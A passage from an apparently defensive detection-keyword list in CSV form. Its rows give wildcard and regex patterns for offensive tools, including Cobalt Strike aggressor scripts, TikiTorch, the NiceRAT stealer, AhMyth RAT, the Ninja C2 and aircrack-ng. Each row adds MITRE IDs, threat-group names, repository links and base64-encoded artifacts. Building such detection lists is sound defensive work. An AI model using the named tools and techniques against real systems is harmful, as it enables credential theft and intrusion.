- Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33719" "*aggressor.cna*",".{0,1000}aggressor\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33720" "*aggressor.dialog*",".{0,1000}aggressor\.dialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33721" "*aggressor.println*",".{0,1000}aggressor\.println.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33722" "*aggressor.py*",".{0,1000}aggressor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33723" "*Aggressor/TikiTorch*",".{0,1000}Aggressor\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","33724" "*AggressorScripts*",".{0,1000}AggressorScripts.{0,1000}","offensive_tool_keyword","AggressorScripts-1","Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/AggressorScripts-1","1","1","N/A","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z","33725" "*aggressor-scripts*",".{0,1000}aggressor\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 
Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z","33726" "*agoakfejjabomempkjlepdflaleeobhb*",".{0,1000}agoakfejjabomempkjlepdflaleeobhb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33727" "*AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA*",".{0,1000}AgUAAAAAAAAAAAAOZG5zLmdvb2dsZS5jb20NL2V4cGVyaW1lbnRhbA.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","33730" 
"*AHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=*",".{0,1000}AHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33731" "*ahmedkhlief/Ninja*",".{0,1000}ahmedkhlief\/Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","33732" "*AhMyth-Android-RAT*",".{0,1000}AhMyth\-Android\-RAT.{0,1000}","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","N/A","10","4747","1746","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z","33733" "*aholpfdialjgjfhomihkjbmgjidlcdno*",".{0,1000}aholpfdialjgjfhomihkjbmgjidlcdno.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - 
TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33734" "*aHR0cDovL3BpbmdjYXN0bGUuY29t*",".{0,1000}aHR0cDovL3BpbmdjYXN0bGUuY29t.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33735" "*aHR0cDovL3BpbmdjYXN0bGUuY29t*",".{0,1000}aHR0cDovL3BpbmdjYXN0bGUuY29t.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33736" "*aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA==*",".{0,1000}aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA\=\=.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - 
TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33737" "*aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA==*",".{0,1000}aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33738" "*ahsten.run \*powershell.exe*",".{0,1000}ahsten\.run\s\\.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","33739" "*aiifbnbfobpmeekipheeijimdpnlpgpp*",".{0,1000}aiifbnbfobpmeekipheeijimdpnlpgpp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33741" 
"*aiocmd\nested_completer.py*",".{0,1000}aiocmd\\nested_completer\.py.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","33742" "*airbase-ng -*",".{0,1000}airbase\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33743" "*Airbash*",".{0,1000}Airbash.{0,1000}","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/tehw0lf/airbash","1","0","#linux","N/A","N/A","4","357","62","2024-10-13T01:02:18Z","2018-04-18T23:50:15Z","33744" "*aircrack.txt*",".{0,1000}aircrack\.txt.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33745" "*Aircrack-ng*",".{0,1000}Aircrack\-ng.{0,1000}","offensive_tool_keyword","aircrack","WiFi security auditing tools suite.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential 
Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33746" "*aircrack-ng*",".{0,1000}aircrack\-ng.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","33747" "*aircrack-ptw-*",".{0,1000}aircrack\-ptw\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33748" "*airdecap-ng -*",".{0,1000}airdecap\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33749" "*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33750" "*aireplay-ng *",".{0,1000}aireplay\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - 
TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33751" "*aireplay-ng -*",".{0,1000}aireplay\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33752" "*Airgeddon*",".{0,1000}Airgeddon.{0,1000}","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","#linux","N/A","5","10","6882","1209","2025-04-15T19:43:18Z","2016-03-18T10:34:56Z","33753" "*airgraph-ng -*",".{0,1000}airgraph\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33754" "*airman604/splunk_whisperer*",".{0,1000}airman604\/splunk_whisperer.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","33755" "*airmon-ng*",".{0,1000}airmon\-ng.{0,1000}","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. 
It may also be used to kill network managers or go back from monitor mode to managed mode","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33756" "*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33757" "*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","aircrack","WiFi security auditing tools suite.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33758" "*airodump-ng *",".{0,1000}airodump\-ng\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33759" "*airolib-ng airolib-db*",".{0,1000}airolib\-ng\sairolib\-db.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33760" "*airpwn-ng*",".{0,1000}airpwn\-ng.{0,1000}","offensive_tool_keyword","airpwn-ng","We force the targets browser to 
do what we want","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","N/A","1","36","13","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z","33761" "*airserv-ng -*",".{0,1000}airserv\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33762" "*airtun-ng -a *",".{0,1000}airtun\-ng\s\-a\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential 